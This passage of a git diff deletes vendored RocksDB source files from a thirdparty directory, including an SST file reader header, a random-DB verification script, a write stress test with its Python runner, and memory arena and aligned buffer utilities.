-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/sst_dump_tool.h"
-
-#include <memory>
-#include <string>
-#include "db/dbformat.h"
-#include "options/cf_options.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class SstFileReader {
- public:
-  explicit SstFileReader(const std::string& file_name, bool verify_checksum,
-                         bool output_hex);
-
-  Status ReadSequential(bool print_kv, uint64_t read_num, bool has_from,
-                        const std::string& from_key, bool has_to,
-                        const std::string& to_key,
-                        bool use_from_as_prefix = false);
-
-  Status ReadTableProperties(
-      std::shared_ptr<const TableProperties>* table_properties);
-  uint64_t GetReadNumber() { return read_num_; }
-  TableProperties* GetInitTableProperties() { return table_properties_.get(); }
-
-  Status VerifyChecksum();
-  Status DumpTable(const std::string& out_filename);
-  Status getStatus() { return init_result_; }
-
-  int ShowAllCompressionSizes(
-      size_t block_size,
-      const std::vector<std::pair<CompressionType, const char*>>&
-          compression_types);
-
- private:
-  // Get the TableReader implementation for the sst file
-  Status GetTableReader(const std::string& file_path);
-  Status ReadTableProperties(uint64_t table_magic_number,
-                             RandomAccessFileReader* file, uint64_t file_size);
-
-  uint64_t CalculateCompressedTableSize(const TableBuilderOptions& tb_options,
-                                        size_t block_size);
-
-  Status SetTableOptionsByMagicNumber(uint64_t table_magic_number);
-  Status SetOldTableOptions();
-
-  // Helper function to call the factory with settings specific to the
-  // factory implementation
-  Status NewTableReader(const ImmutableCFOptions& ioptions,
-                        const EnvOptions& soptions,
-                        const InternalKeyComparator& internal_comparator,
-                        uint64_t file_size,
-                        unique_ptr<TableReader>* table_reader);
-
-  std::string file_name_;
-  uint64_t read_num_;
-  bool verify_checksum_;
-  bool output_hex_;
-  EnvOptions soptions_;
-
-  // options_ and internal_comparator_ will also be used in
-  // ReadSequential internally (specifically, seek-related operations)
-  Options options_;
-
-  Status init_result_;
-  unique_ptr<TableReader> table_reader_;
-  unique_ptr<RandomAccessFileReader> file_;
-
-  const ImmutableCFOptions ioptions_;
-  InternalKeyComparator internal_comparator_;
-  unique_ptr<TableProperties> table_properties_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/verify_random_db.sh b/thirdparty/rocksdb/tools/verify_random_db.sh
deleted file mode 100755
index 7000f5a..0000000
--- a/thirdparty/rocksdb/tools/verify_random_db.sh
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env bash
-#
-# A shell script to verify DB generated by generate_random_db.sh cannot opened and read correct data.
-# ./ldb needs to be avaible to be executed.
-#
-# Usage: <SCRIPT> <DB Path>
-
-scriptpath=`dirname $BASH_SOURCE`
-if [ "$#" -lt 2 ]; then
-  echo "usage: $BASH_SOURCE <db_directory> <compare_base_db_directory> [dump_file_name] [if_try_load_options]"
-  exit 1
-fi
-
-db_dir=$1
-base_db_dir=$2
-dump_file_name=${3:-"dump_file.txt"}
-try_load_options=${4:-"1"}
-db_dump=$db_dir"/"$dump_file_name
-base_db_dump=$base_db_dir"/"$dump_file_name
-extra_param=
-
-if [ "$try_load_options" = "1" ]; then
- extra_param=" --try_load_options "
-fi
-
-set -e
-echo == Dumping data from $db_dir to $db_dump
-./ldb dump --db=$db_dir $extra_param > $db_dump
-
-echo == Dumping data from $base_db_dir to $base_db_dump
-./ldb dump --db=$base_db_dir $extra_param > $base_db_dump
-
-diff $db_dump $base_db_dir
diff --git a/thirdparty/rocksdb/tools/write_stress.cc b/thirdparty/rocksdb/tools/write_stress.cc
deleted file mode 100644
index e5e4204..0000000
--- a/thirdparty/rocksdb/tools/write_stress.cc
+++ /dev/null
@@ -1,307 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-//
-// The goal of this tool is to be a simple stress test with focus on catching:
-// * bugs in compaction/flush processes, especially the ones that cause
-// assertion errors
-// * bugs in the code that deletes obsolete files
-//
-// There are two parts of the test:
-// * write_stress, a binary that writes to the database
-// * write_stress_runner.py, a script that invokes and kills write_stress
-//
-// Here are some interesting parts of write_stress:
-// * Runs with very high concurrency of compactions and flushes (32 threads
-// total) and tries to create a huge amount of small files
-// * The keys written to the database are not uniformly distributed -- there is
-// a 3-character prefix that mutates occasionally (in prefix mutator thread), in
-// such a way that the first character mutates slower than second, which mutates
-// slower than third character. That way, the compaction stress tests some
-// interesting compaction features like trivial moves and bottommost level
-// calculation
-// * There is a thread that creates an iterator, holds it for couple of seconds
-// and then iterates over all keys. This is supposed to test RocksDB's abilities
-// to keep the files alive when there are references to them.
-// * Some writes trigger WAL sync. This is stress testing our WAL sync code.
-// * At the end of the run, we make sure that we didn't leak any of the sst
-// files
-//
-// write_stress_runner.py changes the mode in which we run write_stress and also
-// kills and restarts it. There are some interesting characteristics:
-// * At the beginning we divide the full test runtime into smaller parts --
-// shorter runtimes (couple of seconds) and longer runtimes (100, 1000) seconds
-// * The first time we run write_stress, we destroy the old DB. Every next time
-// during the test, we use the same DB.
-// * We can run in kill mode or clean-restart mode. Kill mode kills the
-// write_stress violently.
-// * We can run in mode where delete_obsolete_files_with_fullscan is true or
-// false
-// * We can run with low_open_files mode turned on or off. When it's turned on,
-// we configure table cache to only hold a couple of files -- that way we need
-// to reopen files every time we access them.
-//
-// Another goal was to create a stress test without a lot of parameters. So
-// tools/write_stress_runner.py should only take one parameter -- runtime_sec
-// and it should figure out everything else on its own.
-
-#include <cstdio>
-
-#ifndef GFLAGS
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#define __STDC_FORMAT_MACROS
-#include <inttypes.h>
-#include <atomic>
-#include <random>
-#include <set>
-#include <string>
-#include <thread>
-
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "util/filename.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_int32(key_size, 10, "Key size");
-DEFINE_int32(value_size, 100, "Value size");
-DEFINE_string(db, "", "Use the db with the following name.");
-DEFINE_bool(destroy_db, true,
-            "Destroy the existing DB before running the test");
-
-DEFINE_int32(runtime_sec, 10 * 60, "How long are we running for, in seconds");
-DEFINE_int32(seed, 139, "Random seed");
-
-DEFINE_double(prefix_mutate_period_sec, 1.0,
-              "How often are we going to mutate the prefix");
-DEFINE_double(first_char_mutate_probability, 0.1,
-              "How likely are we to mutate the first char every period");
-DEFINE_double(second_char_mutate_probability, 0.2,
-              "How likely are we to mutate the second char every period");
-DEFINE_double(third_char_mutate_probability, 0.5,
-              "How likely are we to mutate the third char every period");
-
-DEFINE_int32(iterator_hold_sec, 5,
-             "How long will the iterator hold files before it gets destroyed");
-
-DEFINE_double(sync_probability, 0.01, "How often are we syncing writes");
-DEFINE_bool(delete_obsolete_files_with_fullscan, false,
-            "If true, we delete obsolete files after each compaction/flush "
-            "using GetChildren() API");
-DEFINE_bool(low_open_files_mode, false,
-            "If true, we set max_open_files to 20, so that every file access "
-            "needs to reopen it");
-
-namespace rocksdb {
-
-static const int kPrefixSize = 3;
-
-class WriteStress {
- public:
-  WriteStress() : stop_(false) {
-    // initialize key_prefix
-    for (int i = 0; i < kPrefixSize; ++i) {
-      key_prefix_[i].store('a');
-    }
-
-    // Choose a location for the test database if none given with --db=<path>
-    if (FLAGS_db.empty()) {
-      std::string default_db_path;
-      Env::Default()->GetTestDirectory(&default_db_path);
-      default_db_path += "/write_stress";
-      FLAGS_db = default_db_path;
-    }
-
-    Options options;
-    if (FLAGS_destroy_db) {
-      DestroyDB(FLAGS_db, options);  // ignore
-    }
-
-    // make the LSM tree deep, so that we have many concurrent flushes and
-    // compactions
-    options.create_if_missing = true;
-    options.write_buffer_size = 256 * 1024;              // 256k
-    options.max_bytes_for_level_base = 1 * 1024 * 1024;  // 1MB
-    options.target_file_size_base = 100 * 1024;          // 100k
-    options.max_write_buffer_number = 16;
-    options.max_background_compactions = 16;
-    options.max_background_flushes = 16;
-    options.max_open_files = FLAGS_low_open_files_mode ? 20 : -1;
-    if (FLAGS_delete_obsolete_files_with_fullscan) {
-      options.delete_obsolete_files_period_micros = 0;
-    }
-
-    // open DB
-    DB* db;
-    Status s = DB::Open(options, FLAGS_db, &db);
-    if (!s.ok()) {
-      fprintf(stderr, "Can't open database: %s\n", s.ToString().c_str());
-      std::abort();
-    }
-    db_.reset(db);
-  }
-
-  void WriteThread() {
-    std::mt19937 rng(static_cast<unsigned int>(FLAGS_seed));
-    std::uniform_real_distribution<double> dist(0, 1);
-
-    auto random_string = [](std::mt19937& r, int len) {
-      std::uniform_int_distribution<int> char_dist('a', 'z');
-      std::string ret;
-      for (int i = 0; i < len; ++i) {
-        ret += char_dist(r);
-      }
-      return ret;
-    };
-
-    while (!stop_.load(std::memory_order_relaxed)) {
-      std::string prefix;
-      prefix.resize(kPrefixSize);
-      for (int i = 0; i < kPrefixSize; ++i) {
-        prefix[i] = key_prefix_[i].load(std::memory_order_relaxed);
-      }
-      auto key = prefix + random_string(rng, FLAGS_key_size - kPrefixSize);
-      auto value = random_string(rng, FLAGS_value_size);
-      WriteOptions woptions;
-      woptions.sync = dist(rng) < FLAGS_sync_probability;
-      auto s = db_->Put(woptions, key, value);
-      if (!s.ok()) {
-        fprintf(stderr, "Write to DB failed: %s\n", s.ToString().c_str());
-        std::abort();
-      }
-    }
-  }
-
-  void IteratorHoldThread() {
-    while (!stop_.load(std::memory_order_relaxed)) {
-      std::unique_ptr<Iterator> iterator(db_->NewIterator(ReadOptions()));
-      Env::Default()->SleepForMicroseconds(FLAGS_iterator_hold_sec * 1000 *
-                                           1000LL);
-      for (iterator->SeekToFirst(); iterator->Valid(); iterator->Next()) {
-      }
-      if (!iterator->status().ok()) {
-        fprintf(stderr, "Iterator statuts not OK: %s\n",
-                iterator->status().ToString().c_str());
-        std::abort();
-      }
-    }
-  }
-
-  void PrefixMutatorThread() {
-    std::mt19937 rng(static_cast<unsigned int>(FLAGS_seed));
-    std::uniform_real_distribution<double> dist(0, 1);
-    std::uniform_int_distribution<int> char_dist('a', 'z');
-    while (!stop_.load(std::memory_order_relaxed)) {
-      Env::Default()->SleepForMicroseconds(static_cast<int>(
-                                           FLAGS_prefix_mutate_period_sec *
-                                           1000 * 1000LL));
-      if (dist(rng) < FLAGS_first_char_mutate_probability) {
-        key_prefix_[0].store(char_dist(rng), std::memory_order_relaxed);
-      }
-      if (dist(rng) < FLAGS_second_char_mutate_probability) {
-        key_prefix_[1].store(char_dist(rng), std::memory_order_relaxed);
-      }
-      if (dist(rng) < FLAGS_third_char_mutate_probability) {
-        key_prefix_[2].store(char_dist(rng), std::memory_order_relaxed);
-      }
-    }
-  }
-
-  int Run() {
-    threads_.emplace_back([&]() { WriteThread(); });
-    threads_.emplace_back([&]() { PrefixMutatorThread(); });
-    threads_.emplace_back([&]() { IteratorHoldThread(); });
-
-    if (FLAGS_runtime_sec == -1) {
-      // infinite runtime, until we get killed
-      while (true) {
-        Env::Default()->SleepForMicroseconds(1000 * 1000);
-      }
-    }
-
-    Env::Default()->SleepForMicroseconds(FLAGS_runtime_sec * 1000 * 1000);
-
-    stop_.store(true, std::memory_order_relaxed);
-    for (auto& t : threads_) {
-      t.join();
-    }
-    threads_.clear();
-
-// Skip checking for leaked files in ROCKSDB_LITE since we don't have access to
-// function GetLiveFilesMetaData
-#ifndef ROCKSDB_LITE
-    // let's see if we leaked some files
-    db_->PauseBackgroundWork();
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    std::set<uint64_t> sst_file_numbers;
-    for (const auto& file : metadata) {
-      uint64_t number;
-      FileType type;
-      if (!ParseFileName(file.name, &number, "LOG", &type)) {
-        continue;
-      }
-      if (type == kTableFile) {
-        sst_file_numbers.insert(number);
-      }
-    }
-
-    std::vector<std::string> children;
-    Env::Default()->GetChildren(FLAGS_db, &children);
-    for (const auto& child : children) {
-      uint64_t number;
-      FileType type;
-      if (!ParseFileName(child, &number, "LOG", &type)) {
-        continue;
-      }
-      if (type == kTableFile) {
-        if (sst_file_numbers.find(number) == sst_file_numbers.end()) {
-          fprintf(stderr,
-                  "Found a table file in DB path that should have been "
-                  "deleted: %s\n",
-                  child.c_str());
-          std::abort();
-        }
-      }
-    }
-    db_->ContinueBackgroundWork();
-#endif  // !ROCKSDB_LITE
-
-    return 0;
-  }
-
- private:
-  // each key is prepended with this prefix. we occasionally change it. third
-  // letter is changed more frequently than second, which is changed more
-  // frequently than the first one.
-  std::atomic<char> key_prefix_[kPrefixSize];
-  std::atomic<bool> stop_;
-  std::vector<port::Thread> threads_;
-  std::unique_ptr<DB> db_;
-};
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-  rocksdb::WriteStress write_stress;
-  return write_stress.Run();
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/tools/write_stress_runner.py b/thirdparty/rocksdb/tools/write_stress_runner.py
deleted file mode 100644
index f696578..0000000
--- a/thirdparty/rocksdb/tools/write_stress_runner.py
+++ /dev/null
@@ -1,73 +0,0 @@
-#! /usr/bin/env python
-import subprocess
-import argparse
-import random
-import time
-import sys
-
-
-def generate_runtimes(total_runtime):
-    # combination of short runtimes and long runtimes, with heavier
-    # weight on short runtimes
-    possible_runtimes_sec = range(1, 10) + range(1, 20) + [100, 1000]
-    runtimes = []
-    while total_runtime > 0:
-        chosen = random.choice(possible_runtimes_sec)
-        chosen = min(chosen, total_runtime)
-        runtimes.append(chosen)
-        total_runtime -= chosen
-    return runtimes
-
-
-def main(args):
-    runtimes = generate_runtimes(int(args.runtime_sec))
-    print "Going to execute write stress for " + str(runtimes)
-    first_time = True
-
-    for runtime in runtimes:
-        kill = random.choice([False, True])
-
-        cmd = './write_stress --runtime_sec=' + \
-            ("-1" if kill else str(runtime))
-
-        if len(args.db) > 0:
-            cmd = cmd + ' --db=' + args.db
-
-        if first_time:
-            first_time = False
-        else:
-            # use current db
-            cmd = cmd + ' --destroy_db=false'
-        if random.choice([False, True]):
-            cmd = cmd + ' --delete_obsolete_files_with_fullscan=true'
-        if random.choice([False, True]):
-            cmd = cmd + ' --low_open_files_mode=true'
-
-        print("Running write_stress for %d seconds (%s): %s" %
-              (runtime, ("kill-mode" if kill else "clean-shutdown-mode"),
-              cmd))
-
-        child = subprocess.Popen([cmd], shell=True)
-        killtime = time.time() + runtime
-        while not kill or time.time() < killtime:
-            time.sleep(1)
-            if child.poll() is not None:
-                if child.returncode == 0:
-                    break
-                else:
-                    print("ERROR: write_stress died with exitcode=%d\n"
-                          % child.returncode)
-                    sys.exit(1)
-        if kill:
-            child.kill()
-        # breathe
-        time.sleep(3)
-
-if __name__ == '__main__':
-    random.seed(time.time())
-    parser = argparse.ArgumentParser(description="This script runs and kills \
-        write_stress multiple times")
-    parser.add_argument("--runtime_sec", default='1000')
-    parser.add_argument("--db", default='')
-    args = parser.parse_args()
-    main(args)
diff --git a/thirdparty/rocksdb/util/aligned_buffer.h b/thirdparty/rocksdb/util/aligned_buffer.h
deleted file mode 100644
index e93f4b5..0000000
--- a/thirdparty/rocksdb/util/aligned_buffer.h
+++ /dev/null
@@ -1,179 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <algorithm>
-#include "port/port.h"
-
-namespace rocksdb {
-
-inline size_t TruncateToPageBoundary(size_t page_size, size_t s) {
-  s -= (s & (page_size - 1));
-  assert((s % page_size) == 0);
-  return s;
-}
-
-inline size_t Roundup(size_t x, size_t y) {
-  return ((x + y - 1) / y) * y;
-}
-
-// This class is to manage an aligned user
-// allocated buffer for direct I/O purposes
-// though can be used for any purpose.
-class AlignedBuffer {
-  size_t alignment_;
-  std::unique_ptr<char[]> buf_;
-  size_t capacity_;
-  size_t cursize_;
-  char* bufstart_;
-
-public:
-  AlignedBuffer()
-    : alignment_(),
-      capacity_(0),
-      cursize_(0),
-      bufstart_(nullptr) {
-  }
-
-  AlignedBuffer(AlignedBuffer&& o) ROCKSDB_NOEXCEPT {
-    *this = std::move(o);
-  }
-
-  AlignedBuffer& operator=(AlignedBuffer&& o) ROCKSDB_NOEXCEPT {
-    alignment_ = std::move(o.alignment_);
-    buf_ = std::move(o.buf_);
-    capacity_ = std::move(o.capacity_);
-    cursize_ = std::move(o.cursize_);
-    bufstart_ = std::move(o.bufstart_);
-    return *this;
-  }
-
-  AlignedBuffer(const AlignedBuffer&) = delete;
-
-  AlignedBuffer& operator=(const AlignedBuffer&) = delete;
-
-  static bool isAligned(const void* ptr, size_t alignment) {
-    return reinterpret_cast<uintptr_t>(ptr) % alignment == 0;
-  }
-
-  static bool isAligned(size_t n, size_t alignment) {
-    return n % alignment == 0;
-  }
-
-  size_t Alignment() const {
-    return alignment_;
-  }
-
-  size_t Capacity() const {
-    return capacity_;
-  }
-
-  size_t CurrentSize() const {
-    return cursize_;
-  }
-
-  const char* BufferStart() const {
-    return bufstart_;
-  }
-
-  char* BufferStart() { return bufstart_; }
-
-  void Clear() {
-    cursize_ = 0;
-  }
-
-  void Alignment(size_t alignment) {
-    assert(alignment > 0);
-    assert((alignment & (alignment - 1)) == 0);
-    alignment_ = alignment;
-  }
-
-  // Allocates a new buffer and sets bufstart_ to the aligned first byte
-  void AllocateNewBuffer(size_t requested_capacity, bool copy_data = false) {
-    assert(alignment_ > 0);
-    assert((alignment_ & (alignment_ - 1)) == 0);
-
-    if (copy_data && requested_capacity < cursize_) {
-      // If we are downsizing to a capacity that is smaller than the current
-      // data in the buffer. Ignore the request.
-      return;
-    }
-
-    size_t new_capacity = Roundup(requested_capacity, alignment_);
-    char* new_buf = new char[new_capacity + alignment_];
-    char* new_bufstart = reinterpret_cast<char*>(
-        (reinterpret_cast<uintptr_t>(new_buf) + (alignment_ - 1)) &
-        ~static_cast<uintptr_t>(alignment_ - 1));
-
-    if (copy_data) {
-      memcpy(new_bufstart, bufstart_, cursize_);
-    } else {
-      cursize_ = 0;
-    }
-
-    bufstart_ = new_bufstart;
-    capacity_ = new_capacity;
-    buf_.reset(new_buf);
-  }
-  // Used for write
-  // Returns the number of bytes appended
-  size_t Append(const char* src, size_t append_size) {
-    size_t buffer_remaining = capacity_ - cursize_;
-    size_t to_copy = std::min(append_size, buffer_remaining);
-
-    if (to_copy > 0) {
-      memcpy(bufstart_ + cursize_, src, to_copy);
-      cursize_ += to_copy;
-    }
-    return to_copy;
-  }
-
-  size_t Read(char* dest, size_t offset, size_t read_size) const {
-    assert(offset < cursize_);
-
-    size_t to_read = 0;
-    if(offset < cursize_) {
-      to_read = std::min(cursize_ - offset, read_size);
-    }
-    if (to_read > 0) {
-      memcpy(dest, bufstart_ + offset, to_read);
-    }
-    return to_read;
-  }
-
-  /// Pad to alignment
-  void PadToAlignmentWith(int padding) {
-    size_t total_size = Roundup(cursize_, alignment_);
-    size_t pad_size = total_size - cursize_;
-
-    if (pad_size > 0) {
-      assert((pad_size + cursize_) <= capacity_);
-      memset(bufstart_ + cursize_, padding, pad_size);
-      cursize_ += pad_size;
-    }
-  }
-
-  // After a partial flush move the tail to the beginning of the buffer
-  void RefitTail(size_t tail_offset, size_t tail_size) {
-    if (tail_size > 0) {
-      memmove(bufstart_, bufstart_ + tail_offset, tail_size);
-    }
-    cursize_ = tail_size;
-  }
-
-  // Returns place to start writing
-  char* Destination() {
-    return bufstart_ + cursize_;
-  }
-
-  void Size(size_t cursize) {
-    cursize_ = cursize;
-  }
-};
-}
diff --git a/thirdparty/rocksdb/util/allocator.h b/thirdparty/rocksdb/util/allocator.h
deleted file mode 100644
index 505d6ba..0000000
--- a/thirdparty/rocksdb/util/allocator.h
+++ /dev/null
@@ -1,57 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Abstract interface for allocating memory in blocks. This memory is freed
-// when the allocator object is destroyed. See the Arena class for more info.
-
-#pragma once
-#include <cerrno>
-#include <cstddef>
-#include "rocksdb/write_buffer_manager.h"
-
-namespace rocksdb {
-
-class Logger;
-
-class Allocator {
- public:
-  virtual ~Allocator() {}
-
-  virtual char* Allocate(size_t bytes) = 0;
-  virtual char* AllocateAligned(size_t bytes, size_t huge_page_size = 0,
-                                Logger* logger = nullptr) = 0;
-
-  virtual size_t BlockSize() const = 0;
-};
-
-class AllocTracker {
- public:
-  explicit AllocTracker(WriteBufferManager* write_buffer_manager);
-  ~AllocTracker();
-  void Allocate(size_t bytes);
-  // Call when we're finished allocating memory so we can free it from
-  // the write buffer's limit.
-  void DoneAllocating();
-
-  void FreeMem();
-
-  bool is_freed() const { return write_buffer_manager_ == nullptr || freed_; }
-
- private:
-  WriteBufferManager* write_buffer_manager_;
-  std::atomic<size_t> bytes_allocated_;
-  bool done_allocating_;
-  bool freed_;
-
-  // No copying allowed
-  AllocTracker(const AllocTracker&);
-  void operator=(const AllocTracker&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/arena.cc b/thirdparty/rocksdb/util/arena.cc
deleted file mode 100644
index 6185b5c..0000000
--- a/thirdparty/rocksdb/util/arena.cc
+++ /dev/null
@@ -1,224 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/arena.h"
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-#ifdef OS_FREEBSD
-#include <malloc_np.h>
-#else
-#include <malloc.h>
-#endif
-#endif
-#ifndef OS_WIN
-#include <sys/mman.h>
-#endif
-#include <algorithm>
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/logging.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// MSVC complains that it is already defined since it is static in the header.
-#ifndef _MSC_VER
-const size_t Arena::kInlineSize;
-#endif
-
-const size_t Arena::kMinBlockSize = 4096;
-const size_t Arena::kMaxBlockSize = 2u << 30;
-static const int kAlignUnit = sizeof(void*);
-
-size_t OptimizeBlockSize(size_t block_size) {
-  // Make sure block_size is in optimal range
-  block_size = std::max(Arena::kMinBlockSize, block_size);
-  block_size = std::min(Arena::kMaxBlockSize, block_size);
-
-  // make sure block_size is the multiple of kAlignUnit
-  if (block_size % kAlignUnit != 0) {
-    block_size = (1 + block_size / kAlignUnit) * kAlignUnit;
-  }
-
-  return block_size;
-}
-
-Arena::Arena(size_t block_size, AllocTracker* tracker, size_t huge_page_size)
-    : kBlockSize(OptimizeBlockSize(block_size)), tracker_(tracker) {
-  assert(kBlockSize >= kMinBlockSize && kBlockSize <= kMaxBlockSize &&
-         kBlockSize % kAlignUnit == 0);
-  TEST_SYNC_POINT_CALLBACK("Arena::Arena:0", const_cast<size_t*>(&kBlockSize));
-  alloc_bytes_remaining_ = sizeof(inline_block_);
-  blocks_memory_ += alloc_bytes_remaining_;
-  aligned_alloc_ptr_ = inline_block_;
-  unaligned_alloc_ptr_ = inline_block_ + alloc_bytes_remaining_;
-#ifdef MAP_HUGETLB
-  hugetlb_size_ = huge_page_size;
-  if (hugetlb_size_ && kBlockSize > hugetlb_size_) {
-    hugetlb_size_ = ((kBlockSize - 1U) / hugetlb_size_ + 1U) * hugetlb_size_;
-  }
-#endif
-  if (tracker_ != nullptr) {
-    tracker_->Allocate(kInlineSize);
-  }
-}
-
-Arena::~Arena() {
-  if (tracker_ != nullptr) {
-    assert(tracker_->is_freed());
-    tracker_->FreeMem();
-  }
-  for (const auto& block : blocks_) {
-    delete[] block;
-  }
-
-#ifdef MAP_HUGETLB
-  for (const auto& mmap_info : huge_blocks_) {
-    auto ret = munmap(mmap_info.addr_, mmap_info.length_);
-    if (ret != 0) {
-      // TODO(sdong): Better handling
-    }
-  }
-#endif
-}
-
-char* Arena::AllocateFallback(size_t bytes, bool aligned) {
-  if (bytes > kBlockSize / 4) {
-    ++irregular_block_num;
-    // Object is more than a quarter of our block size.  Allocate it separately
-    // to avoid wasting too much space in leftover bytes.
-    return AllocateNewBlock(bytes);
-  }
-
-  // We waste the remaining space in the current block.
-  size_t size = 0;
-  char* block_head = nullptr;
-#ifdef MAP_HUGETLB
-  if (hugetlb_size_) {
-    size = hugetlb_size_;
-    block_head = AllocateFromHugePage(size);
-  }
-#endif
-  if (!block_head) {
-    size = kBlockSize;
-    block_head = AllocateNewBlock(size);
-  }
-  alloc_bytes_remaining_ = size - bytes;
-
-  if (aligned) {
-    aligned_alloc_ptr_ = block_head + bytes;
-    unaligned_alloc_ptr_ = block_head + size;
-    return block_head;
-  } else {
-    aligned_alloc_ptr_ = block_head;
-    unaligned_alloc_ptr_ = block_head + size - bytes;
-    return unaligned_alloc_ptr_;
-  }
-}
-
-char* Arena::AllocateFromHugePage(size_t bytes) {
-#ifdef MAP_HUGETLB
-  if (hugetlb_size_ == 0) {
-    return nullptr;
-  }
-  // already reserve space in huge_blocks_ before calling mmap().
-  // this way the insertion into the vector below will not throw and we
-  // won't leak the mapping in that case. if reserve() throws, we
-  // won't leak either
-  huge_blocks_.reserve(huge_blocks_.size() + 1);
-
-  void* addr = mmap(nullptr, bytes, (PROT_READ | PROT_WRITE),
-                    (MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB), -1, 0);
-
-  if (addr == MAP_FAILED) {
-    return nullptr;
-  }
-  // the following shouldn't throw because of the above reserve()
-  huge_blocks_.emplace_back(MmapInfo(addr, bytes));
-  blocks_memory_ += bytes;
-  if (tracker_ != nullptr) {
-    tracker_->Allocate(bytes);
-  }
-  return reinterpret_cast<char*>(addr);
-#else
-  return nullptr;
-#endif
-}
-
-char* Arena::AllocateAligned(size_t bytes, size_t huge_page_size,
-                             Logger* logger) {
-  assert((kAlignUnit & (kAlignUnit - 1)) ==
-         0);  // Pointer size should be a power of 2
-
-#ifdef MAP_HUGETLB
-  if (huge_page_size > 0 && bytes > 0) {
-    // Allocate from a huge page TBL table.
-    assert(logger != nullptr);  // logger need to be passed in.
-    size_t reserved_size =
-        ((bytes - 1U) / huge_page_size + 1U) * huge_page_size;
-    assert(reserved_size >= bytes);
-
-    char* addr = AllocateFromHugePage(reserved_size);
-    if (addr == nullptr) {
-      ROCKS_LOG_WARN(logger,
-                     "AllocateAligned fail to allocate huge TLB pages: %s",
-                     strerror(errno));
-      // fail back to malloc
-    } else {
-      return addr;
-    }
-  }
-#endif
-
-  size_t current_mod =
-      reinterpret_cast<uintptr_t>(aligned_alloc_ptr_) & (kAlignUnit - 1);
-  size_t slop = (current_mod == 0 ? 0 : kAlignUnit - current_mod);
-  size_t needed = bytes + slop;
-  char* result;
-  if (needed <= alloc_bytes_remaining_) {
-    result = aligned_alloc_ptr_ + slop;
-    aligned_alloc_ptr_ += needed;
-    alloc_bytes_remaining_ -= needed;
-  } else {
-    // AllocateFallback always returns aligned memory
-    result = AllocateFallback(bytes, true /* aligned */);
-  }
-  assert((reinterpret_cast<uintptr_t>(result) & (kAlignUnit - 1)) == 0);
-  return result;
-}
-
-char* Arena::AllocateNewBlock(size_t block_bytes) {
-  // already reserve space in blocks_ before allocating memory via new.
-  // this way the insertion into the vector below will not throw and we
-  // won't leak the allocated memory in that case. if reserve() throws,
-  // we won't leak either
-  blocks_.reserve(blocks_.size() + 1);
-
-  char* block = new char[block_bytes];
-  size_t allocated_size;
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-  allocated_size = malloc_usable_size(block);
-#ifndef NDEBUG
-  // It's hard to predict what malloc_usable_size() returns.
-  // A callback can allow users to change the costed size.
-  std::pair<size_t*, size_t*> pair(&allocated_size, &block_bytes);
-  TEST_SYNC_POINT_CALLBACK("Arena::AllocateNewBlock:0", &pair);
-#endif  // NDEBUG
-#else
-  allocated_size = block_bytes;
-#endif  // ROCKSDB_MALLOC_USABLE_SIZE
-  blocks_memory_ += allocated_size;
-  if (tracker_ != nullptr) {
-    tracker_->Allocate(allocated_size);
-  }
-  // the following shouldn't throw because of the above reserve()
-  blocks_.push_back(block);
-  return block;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/arena.h b/thirdparty/rocksdb/util/arena.h
deleted file mode 100644
index af53a2f..0000000
--- a/thirdparty/rocksdb/util/arena.h
+++ /dev/null
@@ -1,141 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
